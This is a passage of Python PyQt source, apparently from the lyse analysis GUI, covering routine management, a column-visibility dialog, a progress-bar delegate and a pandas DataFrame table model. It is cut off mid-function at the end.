        self.ui.toolButton_remove_routines.clicked.connect(self.on_remove_selection)
        self.model.itemChanged.connect(self.on_model_item_changed)
        self.ui.treeView.doubleLeftClicked.connect(self.on_treeview_double_left_clicked)
        # A context manager with which we can temporarily disconnect the above connection.
        self.model_item_changed_disconnected = DisconnectContextManager(
            self.model.itemChanged, self.on_model_item_changed)
        self.select_all_checkbox.stateChanged.connect(self.on_select_all_state_changed)
        self.select_all_checkbox_state_changed_disconnected = DisconnectContextManager(
            self.select_all_checkbox.stateChanged, self.on_select_all_state_changed)
        self.ui.treeView.customContextMenuRequested.connect(self.on_treeView_context_menu_requested)
        self.action_set_selected_active.triggered.connect(
            lambda: self.on_set_selected_triggered(QtCore.Qt.Checked))
        self.action_set_selected_inactive.triggered.connect(
            lambda: self.on_set_selected_triggered(QtCore.Qt.Unchecked))
        self.action_restart_selected.triggered.connect(self.on_restart_selected_triggered)
        self.action_remove_selected.triggered.connect(self.on_remove_selection)
        self.ui.toolButton_move_to_top.clicked.connect(self.on_move_to_top_clicked)
        self.ui.toolButton_move_up.clicked.connect(self.on_move_up_clicked)
        self.ui.toolButton_move_down.clicked.connect(self.on_move_down_clicked)
        self.ui.toolButton_move_to_bottom.clicked.connect(self.on_move_to_bottom_clicked)
    def on_add_routines_clicked(self):
        """Prompt the user for routine files and add them, checked, to the box."""
        routine_files = QtWidgets.QFileDialog.getOpenFileNames(self.ui,
                                                               'Select analysis routines',
                                                               self.last_opened_routine_folder,
                                                               "Python scripts (*.py)")
        if isinstance(routine_files, tuple):
            routine_files, _ = routine_files
        if not routine_files:
            # User cancelled selection
            return
        # Convert to standard platform specific path, otherwise Qt likes forward slashes:
        routine_files = [os.path.abspath(routine_file) for routine_file in routine_files]
        # Save the containing folder for use next time we open the dialog box:
        self.last_opened_routine_folder = os.path.dirname(routine_files[0])
        self.add_routines([(routine_file, QtCore.Qt.Checked) for routine_file in routine_files])
    def add_routines(self, routine_files, clear_existing=False):
        """Add routines to the routine box, where routine_files is a list of
        tuples containing the filepath and whether the routine is enabled or
        not when it is added. if clear_existing == True, then any existing
        analysis routines will be cleared before the new ones are added."""
        if clear_existing:
            for routine in self.routines[:]:
                routine.remove()
                self.routines.remove(routine)
        # Queue the files to be opened:
        for filepath, checked in routine_files:
            if filepath in [routine.filepath for routine in self.routines]:
                app.output_box.output('Warning: Ignoring duplicate analysis routine %s\n'%filepath, red=True)
                continue
            routine = AnalysisRoutine(filepath, self.model, self.output_box_port, checked)
            self.routines.append(routine)
        self.update_select_all_checkstate()
    def on_treeview_double_left_clicked(self, index):
        """Open the double-clicked routine in the configured text editor."""
        # If double clicking on the name item, open
        # the routine in the specified text editor:
        if index.column() != self.COL_NAME:
            return
        name_item = self.model.item(index.row(), self.COL_NAME)
        routine_filepath = name_item.data(self.ROLE_FULLPATH)
        # get path to text editor
        editor_path = self.exp_config.get('programs', 'text_editor')
        editor_args = self.exp_config.get('programs', 'text_editor_arguments')
        if not editor_path:
            error_dialog("No editor specified in the labconfig.")
            # Bugfix: bail out here rather than attempting to launch an
            # empty editor path below:
            return
        if '{file}' in editor_args:
            # Split the args on spaces into a list, replacing {file} with the routine file
            editor_args = [arg if arg != '{file}' else routine_filepath for arg in editor_args.split()]
        else:
            # Otherwise if {file} isn't already in there, append it to the other args:
            editor_args = [routine_filepath] + editor_args.split()
        try:
            subprocess.Popen([editor_path] + editor_args)
        except Exception as e:
            error_dialog("Unable to launch text editor specified in %s. Error was: %s" %
                         (self.exp_config.config_path, str(e)))
    def on_remove_selection(self):
        self.remove_selection()
    def remove_selection(self, confirm=True):
        """Remove the currently selected routines, ending their worker
        processes, optionally asking the user for confirmation first."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        if not selected_rows:
            return
        if confirm and not question_dialog("Remove %d routines?" % len(selected_rows)):
            return
        name_items = [self.model.item(row, self.COL_NAME) for row in selected_rows]
        filepaths = [item.data(self.ROLE_FULLPATH) for item in name_items]
        for routine in self.routines[:]:
            if routine.filepath in filepaths:
                routine.remove()
                self.routines.remove(routine)
        self.update_select_all_checkstate()
    def on_model_item_changed(self, item):
        if item.column() == self.COL_ACTIVE:
            self.update_select_all_checkstate()
    def on_select_all_state_changed(self, state):
        """Propagate the 'select all' header checkbox to every routine row."""
        with self.select_all_checkbox_state_changed_disconnected:
            # Do not allow a switch *to* a partially checked state:
            self.select_all_checkbox.setTristate(False)
            state = self.select_all_checkbox.checkState()
            with self.model_item_changed_disconnected:
                for row in range(self.model.rowCount()):
                    active_item = self.model.item(row, self.COL_ACTIVE)
                    active_item.setCheckState(state)
    def on_treeView_context_menu_requested(self, point):
        menu = QtWidgets.QMenu(self.ui.treeView)
        menu.addAction(self.action_set_selected_active)
        menu.addAction(self.action_set_selected_inactive)
        menu.addAction(self.action_restart_selected)
        menu.addAction(self.action_remove_selected)
        menu.exec_(QtGui.QCursor.pos())
    def on_set_selected_triggered(self, active):
        """Set the 'active' checkstate of all selected routines to ``active``."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        for row in selected_rows:
            active_item = self.model.item(row, self.COL_ACTIVE)
            active_item.setCheckState(active)
        self.update_select_all_checkstate()
    def on_move_to_top_clicked(self):
        """Move selected rows to the top, preserving their relative order."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        n = self.model.rowCount()
        i_selected = 0
        i_unselected = len(selected_rows)
        order = []
        for i in range(n):
            if i in selected_rows:
                order.append(i_selected)
                i_selected += 1
            else:
                order.append(i_unselected)
                i_unselected += 1
        self.reorder(order)
    def on_move_up_clicked(self):
        """Move each selected row up by one, past the nearest unselected row."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        n = self.model.rowCount()
        order = []
        last_unselected_index = None
        for i in range(n):
            if i in selected_rows:
                if last_unselected_index is None:
                    # Already at the top; stays put:
                    order.append(i)
                else:
                    # Swap with the unselected row above:
                    order.append(i - 1)
                    order[last_unselected_index] += 1
            else:
                last_unselected_index = i
                order.append(i)
        self.reorder(order)
    def on_move_down_clicked(self):
        """Move each selected row down by one, past the nearest unselected row."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        n = self.model.rowCount()
        order = []
        last_unselected_index = None
        # Iterate bottom-up, building order from the front:
        for i in reversed(range(n)):
            if i in selected_rows:
                if last_unselected_index is None:
                    # Already at the bottom; stays put:
                    order.insert(0, i)
                else:
                    # Swap with the unselected row below:
                    order.insert(0, i + 1)
                    order[last_unselected_index - n] -= 1
            else:
                last_unselected_index = i
                order.insert(0, i)
        self.reorder(order)
    def on_move_to_bottom_clicked(self):
        """Move selected rows to the bottom, preserving their relative order."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        n = self.model.rowCount()
        i_selected = n - len(selected_rows)
        i_unselected = 0
        order = []
        for i in range(n):
            if i in selected_rows:
                order.append(i_selected)
                i_selected += 1
            else:
                order.append(i_unselected)
                i_unselected += 1
        self.reorder(order)
    def on_restart_selected_triggered(self):
        """Restart the worker processes of all selected routines."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        name_items = [self.model.item(row, self.COL_NAME) for row in selected_rows]
        filepaths = [item.data(self.ROLE_FULLPATH) for item in name_items]
        for routine in self.routines:
            if routine.filepath in filepaths:
                routine.restart()
        self.update_select_all_checkstate()
    def analysis_loop(self):
        """Background thread: run all routines on each file received from the
        filebox. For multishot boxes the received filepath is always None."""
        while True:
            filepath = self.from_filebox.get()
            if self.multishot:
                assert filepath is None
                # TODO: get the filepath of the output h5 file:
                # filepath = self.filechooserentry.get_text()
            self.logger.info('got a file to process: %s'%filepath)
            self.do_analysis(filepath)
    def todo(self):
        """How many analysis routines are not done?"""
        return len([r for r in self.routines if r.enabled() and not r.done])
    def do_analysis(self, filepath):
        """Run all analysis routines once on the given filepath,
        which is a shot file if we are a singleshot routine box"""
        for routine in self.routines:
            routine.set_status('clear')
        remaining = self.todo()
        error = False
        updated_data = {}
        while remaining:
            self.logger.debug('%d routines left to do'%remaining)
            # Find the next enabled, not-yet-done routine:
            for routine in self.routines:
                if routine.enabled() and not routine.done:
                    break
            else:
                routine = None
            if routine is not None:
                self.logger.info('running analysis routine %s'%routine.shortname)
                routine.set_status('working')
                success, updated_data = routine.do_analysis(filepath)
                if success:
                    routine.set_status('done')
                    self.logger.debug('success')
                else:
                    routine.set_status('error')
                    self.logger.debug('failure')
                    error = True
                    break
            # Race conditions here, but it's only for reporting percent done
            # so it doesn't matter if it's wrong briefly:
            remaining = self.todo()
            total = len([r for r in self.routines if r.enabled()])
            done = total - remaining
            try:
                status_percent = 100*float(done)/(remaining + done)
            except ZeroDivisionError:
                # All routines got deleted mid-analysis, we're done here:
                status_percent = 100.0
            self.to_filebox.put(['progress', status_percent, updated_data])
        if error:
            self.to_filebox.put(['error', None, updated_data])
        else:
            self.to_filebox.put(['done', 100.0, {}])
        self.logger.debug('completed analysis of %s'%filepath)
    def reorder(self, order):
        """Reorder the model's rows (and self.routines) so the row currently
        at index i moves to index order[i]."""
        assert len(order) == len(set(order)), 'ordering contains non-unique elements'
        # Apply the reordering to the liststore:
        for old_index, new_index in enumerate(order):
            name_item = self.model.item(old_index, self.COL_NAME)
            name_item.setData(new_index, self.ROLE_SORTINDEX)
        self.ui.treeView.sortByColumn(self.COL_NAME, QtCore.Qt.AscendingOrder)
        # Apply new order to our list of routines too:
        self.routines = [self.routines[order.index(i)] for i in range(len(order))]
    def update_select_all_checkstate(self):
        """Set the header 'select all' checkbox to checked, unchecked or
        partially checked to reflect the routines' current checkstates."""
        with self.select_all_checkbox_state_changed_disconnected:
            all_states = []
            for row in range(self.model.rowCount()):
                active_item = self.model.item(row, self.COL_ACTIVE)
                all_states.append(active_item.checkState())
            if all(state == QtCore.Qt.Checked for state in all_states):
                self.select_all_checkbox.setCheckState(QtCore.Qt.Checked)
            elif all(state == QtCore.Qt.Unchecked for state in all_states):
                self.select_all_checkbox.setCheckState(QtCore.Qt.Unchecked)
            else:
                self.select_all_checkbox.setCheckState(QtCore.Qt.PartiallyChecked)
class EditColumnsDialog(QtWidgets.QDialog):
    """Dialog window for editing column visibility. Closing is intercepted
    and reported via close_signal instead of actually closing the widget."""

    # Emitted when the window manager has created a new native window for this widget:
    newWindow = Signal(int)
    # Emitted instead of closing when the user attempts to close the dialog:
    close_signal = Signal()

    def __init__(self):
        window_flags = QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint
        QtWidgets.QDialog.__init__(self, None, window_flags)

    def event(self, event):
        result = QtWidgets.QDialog.event(self, event)
        if event.type() == QtCore.QEvent.WinIdChange:
            self.newWindow.emit(self.effectiveWinId())
        return result

    def closeEvent(self, event):
        # Don't actually close; let the owner decide what to do:
        self.close_signal.emit()
        event.ignore()
class EditColumns(object):
    """The 'edit columns' dialog: lets the user choose which dataframe
    columns are visible in the filebox. Maintains a working copy of the
    visibility mapping (self.columns_visible) plus a snapshot taken when the
    dialog is shown (self.old_columns_visible) for reverting on cancel."""
    ROLE_SORT_DATA = QtCore.Qt.UserRole + 1
    COL_VISIBLE = 0
    COL_NAME = 1
    def __init__(self, filebox, column_names, columns_visible):
        self.filebox = filebox
        # Working copies; originals belong to the filebox:
        self.column_names = column_names.copy()
        self.columns_visible = columns_visible.copy()
        self.old_columns_visible = columns_visible.copy()
        loader = UiLoader()
        self.ui = loader.load(os.path.join(LYSE_DIR, 'edit_columns.ui'), EditColumnsDialog())
        self.model = UneditableModel()
        self.header = HorizontalHeaderViewWithWidgets(self.model)
        self.select_all_checkbox = QtWidgets.QCheckBox()
        self.select_all_checkbox.setTristate(False)
        self.ui.treeView.setHeader(self.header)
        # Proxy model provides the name filter and sorting:
        self.proxy_model = QtCore.QSortFilterProxyModel()
        self.proxy_model.setSourceModel(self.model)
        self.proxy_model.setFilterCaseSensitivity(QtCore.Qt.CaseInsensitive)
        self.proxy_model.setFilterKeyColumn(self.COL_NAME)
        self.ui.treeView.setSortingEnabled(True)
        self.header.setStretchLastSection(True)
        self.proxy_model.setSortRole(self.ROLE_SORT_DATA)
        self.ui.treeView.setModel(self.proxy_model)
        self.ui.setWindowModality(QtCore.Qt.ApplicationModal)
        self.ui.treeView.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
        # Make the actions for the context menu:
        self.action_set_selected_visible = QtWidgets.QAction(
            QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'Show selected columns', self.ui)
        self.action_set_selected_hidden = QtWidgets.QAction(
            QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'Hide selected columns', self.ui)
        self.connect_signals()
        self.populate_model(column_names, self.columns_visible)
    def connect_signals(self):
        """Connect all UI signals to their handlers."""
        if os.name == 'nt':
            self.ui.newWindow.connect(set_win_appusermodel)
        self.ui.close_signal.connect(self.close)
        self.ui.lineEdit_filter.textEdited.connect(self.on_filter_text_edited)
        self.ui.pushButton_make_it_so.clicked.connect(self.make_it_so)
        self.ui.pushButton_cancel.clicked.connect(self.cancel)
        self.model.itemChanged.connect(self.on_model_item_changed)
        # A context manager with which we can temporarily disconnect the above connection.
        self.model_item_changed_disconnected = DisconnectContextManager(
            self.model.itemChanged, self.on_model_item_changed)
        self.select_all_checkbox.stateChanged.connect(self.on_select_all_state_changed)
        self.select_all_checkbox_state_changed_disconnected = DisconnectContextManager(
            self.select_all_checkbox.stateChanged, self.on_select_all_state_changed)
        self.ui.treeView.customContextMenuRequested.connect(self.on_treeView_context_menu_requested)
        self.action_set_selected_visible.triggered.connect(
            lambda: self.on_set_selected_triggered(QtCore.Qt.Checked))
        self.action_set_selected_hidden.triggered.connect(
            lambda: self.on_set_selected_triggered(QtCore.Qt.Unchecked))
    def populate_model(self, column_names, columns_visible):
        """Rebuild the model from scratch: one row per (tuple-named) column,
        sorted by the comma-joined, lower-cased name."""
        self.model.clear()
        self.model.setHorizontalHeaderLabels(['', 'Name'])
        self.header.setWidget(self.COL_VISIBLE, self.select_all_checkbox)
        self.ui.treeView.resizeColumnToContents(self.COL_VISIBLE)
        # Which indices in self.columns_visible the row numbers correspond to
        self.column_indices = {}
        # Remove our special columns from the dict of column names by keeping only tuples:
        column_names = {i: name for i, name in column_names.items() if isinstance(name, tuple)}
        # Sort the column names as comma separated values, converting to lower case:
        sortkey = lambda item: ', '.join(item[1]).lower().strip(', ')
        for column_index, name in sorted(column_names.items(), key=sortkey):
            visible = columns_visible[column_index]
            visible_item = QtGui.QStandardItem()
            visible_item.setCheckable(True)
            # Mirror the checkstate into the sort role so the visible column
            # can be sorted on too:
            if visible:
                visible_item.setCheckState(QtCore.Qt.Checked)
                visible_item.setData(QtCore.Qt.Checked, self.ROLE_SORT_DATA)
            else:
                visible_item.setCheckState(QtCore.Qt.Unchecked)
                visible_item.setData(QtCore.Qt.Unchecked, self.ROLE_SORT_DATA)
            name_as_string = ', '.join(name).strip(', ')
            name_item = QtGui.QStandardItem(name_as_string)
            name_item.setData(sortkey((column_index, name)), self.ROLE_SORT_DATA)
            self.model.appendRow([visible_item, name_item])
            self.column_indices[self.model.rowCount() - 1] = column_index
        self.ui.treeView.resizeColumnToContents(self.COL_NAME)
        self.update_select_all_checkstate()
        self.ui.treeView.sortByColumn(self.COL_NAME, QtCore.Qt.AscendingOrder)
    def on_treeView_context_menu_requested(self, point):
        menu = QtWidgets.QMenu(self.ui)
        menu.addAction(self.action_set_selected_visible)
        menu.addAction(self.action_set_selected_hidden)
        menu.exec_(QtGui.QCursor.pos())
    def on_set_selected_triggered(self, visible):
        """Set the visibility checkstate of all selected rows and push the
        result to the filebox immediately."""
        selected_indexes = self.ui.treeView.selectedIndexes()
        # Map proxy (filtered/sorted) indices back to source model rows:
        selected_rows = set(self.proxy_model.mapToSource(index).row() for index in selected_indexes)
        for row in selected_rows:
            visible_item = self.model.item(row, self.COL_VISIBLE)
            self.update_visible_state(visible_item, visible)
        self.update_select_all_checkstate()
        self.do_sort()
        self.filebox.set_columns_visible(self.columns_visible)
    def on_filter_text_edited(self, text):
        self.proxy_model.setFilterWildcard(text)
    def on_select_all_state_changed(self, state):
        """Propagate the 'select all' header checkbox to every row."""
        with self.select_all_checkbox_state_changed_disconnected:
            # Do not allow a switch *to* a partially checked state:
            self.select_all_checkbox.setTristate(False)
            state = self.select_all_checkbox.checkState()
            for row in range(self.model.rowCount()):
                visible_item = self.model.item(row, self.COL_VISIBLE)
                self.update_visible_state(visible_item, state)
            self.do_sort()
        self.filebox.set_columns_visible(self.columns_visible)
    def update_visible_state(self, item, state):
        """Set one row's checkstate, its sort data, and the corresponding
        entry of self.columns_visible, without re-triggering our own
        itemChanged handler."""
        assert item.column() == self.COL_VISIBLE, "unexpected column"
        row = item.row()
        with self.model_item_changed_disconnected:
            item.setCheckState(state)
            item.setData(state, self.ROLE_SORT_DATA)
            if state == QtCore.Qt.Checked:
                self.columns_visible[self.column_indices[row]] = True
            else:
                self.columns_visible[self.column_indices[row]] = False
    def update_select_all_checkstate(self):
        """Set the header checkbox to checked/unchecked/partial to reflect
        the rows' current checkstates."""
        with self.select_all_checkbox_state_changed_disconnected:
            all_states = []
            for row in range(self.model.rowCount()):
                visible_item = self.model.item(row, self.COL_VISIBLE)
                all_states.append(visible_item.checkState())
            if all(state == QtCore.Qt.Checked for state in all_states):
                self.select_all_checkbox.setCheckState(QtCore.Qt.Checked)
            elif all(state == QtCore.Qt.Unchecked for state in all_states):
                self.select_all_checkbox.setCheckState(QtCore.Qt.Unchecked)
            else:
                self.select_all_checkbox.setCheckState(QtCore.Qt.PartiallyChecked)
    def on_model_item_changed(self, item):
        state = item.checkState()
        self.update_visible_state(item, state)
        self.update_select_all_checkstate()
        self.do_sort()
        self.filebox.set_columns_visible(self.columns_visible)
    def do_sort(self):
        """Re-sort the view by whatever column/order the header indicates."""
        header = self.ui.treeView.header()
        sort_column = header.sortIndicatorSection()
        sort_order = header.sortIndicatorOrder()
        self.ui.treeView.sortByColumn(sort_column, sort_order)
    def update_columns(self, column_names, columns_visible):
        """Called when the filebox's columns change: adopt the new
        index/name mapping while preserving the 'before editing' snapshot."""
        # Index/name mapping may have changed. Get a mapping by *name* of
        # which columns were previously visible, so we can update our by-index
        # mapping in a moment:
        old_columns_visible_by_name = {}
        for old_column_number, visible in self.old_columns_visible.items():
            column_name = self.column_names[old_column_number]
            old_columns_visible_by_name[column_name] = visible
        self.columns_visible = columns_visible.copy()
        self.column_names = column_names.copy()
        # Update the by-index mapping of which columns were visible before editing:
        self.old_columns_visible = {}
        for index, name in self.column_names.items():
            try:
                self.old_columns_visible[index] = old_columns_visible_by_name[name]
            except KeyError:
                # A new column. If editing is cancelled, any new columns
                # should be set to visible:
                self.old_columns_visible[index] = True
        self.populate_model(column_names, self.columns_visible)
    def show(self):
        # Snapshot current visibility so cancel/close can revert to it:
        self.old_columns_visible = self.columns_visible.copy()
        self.ui.show()
    def close(self):
        # Revert to the snapshot taken at show() and push it to the filebox:
        self.columns_visible = self.old_columns_visible.copy()
        self.filebox.set_columns_visible(self.columns_visible)
        self.populate_model(self.column_names, self.columns_visible)
        self.ui.hide()
    def cancel(self):
        # Triggers the dialog's close_signal, which calls self.close():
        self.ui.close()
    def make_it_so(self):
        # Changes were already applied live; just dismiss the dialog:
        self.ui.hide()
class ItemDelegate(QtWidgets.QStyledItemDelegate):
    """An item delegate with a fixed row height, which renders a progress bar
    in the status column whenever the status-percent role is not 100."""
    EXTRA_ROW_HEIGHT = 2

    def __init__(self, view, model, col_status, role_status_percent):
        self.view = view
        self.model = model
        self.COL_STATUS = col_status
        self.ROLE_STATUS_PERCENT = role_status_percent
        QtWidgets.QStyledItemDelegate.__init__(self)

    def sizeHint(self, *args):
        # Fix the row height to the view's font height plus a little padding:
        metrics = QtGui.QFontMetrics(self.view.font())
        fixed_height = metrics.height() + self.EXTRA_ROW_HEIGHT
        default_size = QtWidgets.QStyledItemDelegate.sizeHint(self, *args)
        return QtCore.QSize(default_size.width(), fixed_height)

    def paint(self, painter, option, index):
        if index.column() != self.COL_STATUS:
            return QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
        status_percent = self.model.data(index, self.ROLE_STATUS_PERCENT)
        if status_percent == 100:
            # Render as a normal item - this shows whatever icon is set instead of a progress bar.
            return QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
        # Method of rendering a progress bar into the view copied from
        # Qt's 'network-torrent' example:
        # http://qt-project.org/doc/qt-4.8/network-torrent-torrentclient-cpp.html
        # Set up a QStyleOptionProgressBar to precisely mimic the
        # environment of a progress bar.
        bar_option = QtWidgets.QStyleOptionProgressBar()
        bar_option.state = QtWidgets.QStyle.State_Enabled
        bar_option.direction = qapplication.layoutDirection()
        bar_option.rect = option.rect
        bar_option.fontMetrics = qapplication.fontMetrics()
        bar_option.minimum = 0
        bar_option.maximum = 100
        bar_option.textAlignment = QtCore.Qt.AlignCenter
        bar_option.textVisible = True
        # Set the progress and text values of the style option.
        bar_option.progress = status_percent
        bar_option.text = '%d%%' % status_percent
        # Draw the progress bar onto the view.
        qapplication.style().drawControl(QtWidgets.QStyle.CE_ProgressBar, bar_option, painter)
class UneditableModel(QtGui.QStandardItemModel):
    def flags(self, index):
        """Same flags as QStandardItemModel, but with ItemIsEditable
        always cleared so items can never be edited in place."""
        default_flags = QtGui.QStandardItemModel.flags(self, index)
        return default_flags & ~QtCore.Qt.ItemIsEditable
class TableView(QtWidgets.QTableView):
    """A QTableView that emits a custom signal leftClicked(index) after a left
    click on a valid index, and doubleLeftClicked(index) (in addition) on
    double click. Multiple inheritance of QObjects is not possible, so we
    are forced to duplicate code instead of sharing code with the extremely
    similar TreeView class in this module"""
    # Bugfix: the docstring above was previously a bare string *after* the
    # Signal attributes, so it was not the class docstring (__doc__ was None).
    leftClicked = Signal(QtCore.QModelIndex)
    doubleLeftClicked = Signal(QtCore.QModelIndex)
    def __init__(self, *args):
        QtWidgets.QTableView.__init__(self, *args)
        # Index under the mouse at the time of the last left-button press:
        self._pressed_index = None
        # Whether the click in progress is the second click of a double click:
        self._double_click = False
    def mousePressEvent(self, event):
        result = QtWidgets.QTableView.mousePressEvent(self, event)
        index = self.indexAt(event.pos())
        if event.button() == QtCore.Qt.LeftButton and index.isValid():
            self._pressed_index = self.indexAt(event.pos())
        return result
    def leaveEvent(self, event):
        # Mouse left the widget mid-click: cancel any pending click state.
        result = QtWidgets.QTableView.leaveEvent(self, event)
        self._pressed_index = None
        self._double_click = False
        return result
    def mouseDoubleClickEvent(self, event):
        # Ensure our left click event occurs regardless of whether it is the
        # second click in a double click or not
        result = QtWidgets.QTableView.mouseDoubleClickEvent(self, event)
        index = self.indexAt(event.pos())
        if event.button() == QtCore.Qt.LeftButton and index.isValid():
            self._pressed_index = self.indexAt(event.pos())
            self._double_click = True
        return result
    def mouseReleaseEvent(self, event):
        # Only emit if the release is over the same index that was pressed,
        # like a normal button click:
        result = QtWidgets.QTableView.mouseReleaseEvent(self, event)
        index = self.indexAt(event.pos())
        if event.button() == QtCore.Qt.LeftButton and index.isValid() and index == self._pressed_index:
            self.leftClicked.emit(index)
            if self._double_click:
                self.doubleLeftClicked.emit(index)
        self._pressed_index = None
        self._double_click = False
        return result
class DataFrameModel(QtCore.QObject):
    """Mediates between a pandas DataFrame of per-shot scalar data and a Qt
    QStandardItemModel displayed in a TableView.

    Rows correspond to shot (HDF5) files. Columns are a fixed status column,
    a fixed filepath column, and one column per entry of the DataFrame's
    column MultiIndex. Methods decorated with @inmain_decorator() are safe to
    call from worker threads; they run in the Qt main thread.
    """
    # Fixed positions of the two special (non-dataframe) columns:
    COL_STATUS = 0
    COL_FILEPATH = 1
    # Custom item-data roles: percent completion of single-shot analysis, and
    # whether the shot file has been deleted off disk / become unreadable:
    ROLE_STATUS_PERCENT = QtCore.Qt.UserRole + 1
    ROLE_DELETED_OFF_DISK = QtCore.Qt.UserRole + 2
    # Emitted whenever columns are added to or removed from the model:
    columns_changed = Signal()
    def __init__(self, view, exp_config):
        """Set up the Qt model, headers, delegate and the empty dataframe.

        view: the TableView this model drives.
        exp_config: LabConfig-style configuration object; read for the
            'lyse'/'integer_indexing' option and the hdf5 viewer settings.
        """
        QtCore.QObject.__init__(self)
        self._view = view
        self.exp_config = exp_config
        self._model = UneditableModel()
        # Fast lookup of a shot's row number from its filepath; kept in sync
        # by renumber_rows():
        self.row_number_by_filepath = {}
        # Number of digits used for row labels last time we renumbered; when
        # it changes, all labels must be regenerated:
        self._previous_n_digits = 0
        self._header = HorizontalHeaderViewWithWidgets(self._model)
        self._vertheader = QtWidgets.QHeaderView(QtCore.Qt.Vertical)
        self._vertheader.setSectionResizeMode(QtWidgets.QHeaderView.Fixed)
        # Smaller font for headers:
        font = self._vertheader.font()
        font.setPointSize(10 if sys.platform == 'darwin' else 8)
        self._header.setFont(font)
        # Monospaced font for the vertical header so row numbers line up:
        font.setFamily('Ubuntu Mono')
        self._vertheader.setFont(font)
        self._vertheader.setHighlightSections(True)
        self._vertheader.setSectionsClickable(True)
        self._view.setModel(self._model)
        self._view.setHorizontalHeader(self._header)
        self._view.setVerticalHeader(self._vertheader)
        # Delegate draws the progress bar in the status column:
        self._delegate = ItemDelegate(self._view, self._model, self.COL_STATUS, self.ROLE_STATUS_PERCENT)
        self._view.setItemDelegate(self._delegate)
        self._view.setSelectionBehavior(QtWidgets.QTableView.SelectRows)
        self._view.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
        # Check if integer indexing is to be used
        try:
            self.integer_indexing = self.exp_config.getboolean('lyse', 'integer_indexing')
        except (LabConfig.NoOptionError, LabConfig.NoSectionError):
            self.integer_indexing = False
        # This dataframe will contain all the scalar data
        # from the shot files that are currently open:
        index = pandas.MultiIndex.from_tuples([('filepath', '')])
        self.dataframe = pandas.DataFrame({'filepath': []}, columns=index)
        # How many levels the dataframe's multiindex has:
        self.nlevels = self.dataframe.columns.nlevels
        status_item = QtGui.QStandardItem()
        status_item.setIcon(QtGui.QIcon(':qtutils/fugue/information'))
        status_item.setToolTip('status/progress of single-shot analysis')
        self._model.setHorizontalHeaderItem(self.COL_STATUS, status_item)
        filepath_item = QtGui.QStandardItem('filepath')
        filepath_item.setToolTip('filepath')
        self._model.setHorizontalHeaderItem(self.COL_FILEPATH, filepath_item)
        self._view.setColumnWidth(self.COL_STATUS, 70)
        self._view.setColumnWidth(self.COL_FILEPATH, 100)
        # Column indices to names and vice versa for fast lookup:
        self.column_indices = {'__status': self.COL_STATUS, ('filepath', ''): self.COL_FILEPATH}
        self.column_names = {self.COL_STATUS: '__status', self.COL_FILEPATH: ('filepath', '')}
        self.columns_visible = {self.COL_STATUS: True, self.COL_FILEPATH: True}
        # Whether or not a deleted column was visible at the time it was deleted (by name):
        self.deleted_columns_visible = {}
        # Make the actions for the context menu:
        self.action_remove_selected = QtWidgets.QAction(
            QtGui.QIcon(':qtutils/fugue/minus'), 'Remove selected shots', self._view)
        self.connect_signals()
    def connect_signals(self):
        """Connect the view's context-menu and the remove action's signals."""
        self._view.customContextMenuRequested.connect(self.on_view_context_menu_requested)
        self.action_remove_selected.triggered.connect(self.on_remove_selection)
    def on_remove_selection(self):
        """Slot for the 'Remove selected shots' action."""
        self.remove_selection()
    def remove_selection(self, confirm=True):
        """Remove the currently selected shots from both the dataframe and the
        Qt model, optionally asking the user for confirmation first."""
        selection_model = self._view.selectionModel()
        selected_indexes = selection_model.selectedRows()
        selected_name_items = [self._model.itemFromIndex(index) for index in selected_indexes]
        if not selected_name_items:
            return
        if confirm and not question_dialog("Remove %d shots?" % len(selected_name_items)):
            return
        # Remove from DataFrame first:
        self.dataframe = self.dataframe.drop(index.row() for index in selected_indexes)
        self.dataframe.index = pandas.Index(range(len(self.dataframe)))
        # Delete one at a time from Qt model:
        for name_item in selected_name_items:
            # Ask the item for its (current) row each time, since earlier
            # removals shift the rows of the remaining items:
            row = name_item.row()
            self._model.removeRow(row)
        self.renumber_rows()
    def mark_selection_not_done(self):
        """Reset the analysis progress of the selected rows to zero so the
        analysis loop will pick them up again."""
        selected_indexes = self._view.selectedIndexes()
        selected_rows = set(index.row() for index in selected_indexes)
        for row in selected_rows:
            status_item = self._model.item(row, self.COL_STATUS)
            if status_item.data(self.ROLE_DELETED_OFF_DISK):
                # If the shot was previously not readable on disk, check to
                # see if it's readable now. It may have been undeleted or
                # perhaps it being unreadable before was due to a network
                # glitch or similar.
                filepath = self._model.item(row, self.COL_FILEPATH).text()
                if not os.path.exists(filepath):
                    continue
                # Shot file is accesible again:
                status_item.setData(False, self.ROLE_DELETED_OFF_DISK)
                status_item.setIcon(QtGui.QIcon(':qtutils/fugue/tick'))
                status_item.setToolTip(None)
            status_item.setData(0, self.ROLE_STATUS_PERCENT)
    def on_view_context_menu_requested(self, point):
        """Show the context menu (currently just 'Remove selected shots')."""
        menu = QtWidgets.QMenu(self._view)
        menu.addAction(self.action_remove_selected)
        menu.exec_(QtGui.QCursor.pos())
    def on_double_click(self, index):
        """Open the double-clicked shot file in the configured hdf5 viewer."""
        filepath_item = self._model.item(index.row(), self.COL_FILEPATH)
        shot_filepath = filepath_item.text()
        # get path to text editor
        viewer_path = self.exp_config.get('programs', 'hdf5_viewer')
        viewer_args = self.exp_config.get('programs', 'hdf5_viewer_arguments')
        # Get the current labscript file:
        if not viewer_path:
            error_dialog("No hdf5 viewer specified in the labconfig.")
        if '{file}' in viewer_args:
            # Split the args on spaces into a list, replacing {file} with the labscript file
            viewer_args = [arg if arg != '{file}' else shot_filepath for arg in viewer_args.split()]
        else:
